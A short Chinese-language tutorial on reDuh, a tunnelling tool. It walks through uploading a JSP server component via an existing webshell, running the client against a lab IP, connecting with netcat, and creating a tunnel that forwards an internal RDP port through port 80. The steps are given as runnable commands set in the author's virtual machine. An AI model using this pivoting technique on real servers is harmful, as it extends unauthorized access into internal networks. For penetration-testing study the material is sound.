0x00 reduh
经常我们拿到一个shell后,发现只将目标服务器的80端口映射到公网ip地址,无法访问其他端口,如3389或3306等
这时可以通过reduh做一个跳板,将特定端口通过开放的80端口从内网中转发出来
0x00 So Easy
首先我们需要一个webshell,这里我直接在虚拟机里面写一个了
然后通过webshell上传reduh的服务端,在
\reDuhServers\
目录下这里用的jsp的环境就上传一个jsp的服务端
上传后的地址为
http://192.168.49.154:8080/reDuh.jsp
然后本地通过命令行执行reduh的客户端(位于\reDuhClient\dist\
目录下)
java -jar reDuhClient.jar http://192.168.49.154:8080/reDuh.jsp
然后通过nc监听本地1010端口
nc.exe -nvv 127.0.0.1 1010
然后创建隧道,以将3389端口为例
[createTunnel]6666:127.0.0.1:3389
然后本地通过mstsc连接
127.0.0.1:6666
这时能看到reduh本地客户端产生了流量
这样就可以通过webshell建立其他端口的通信隧道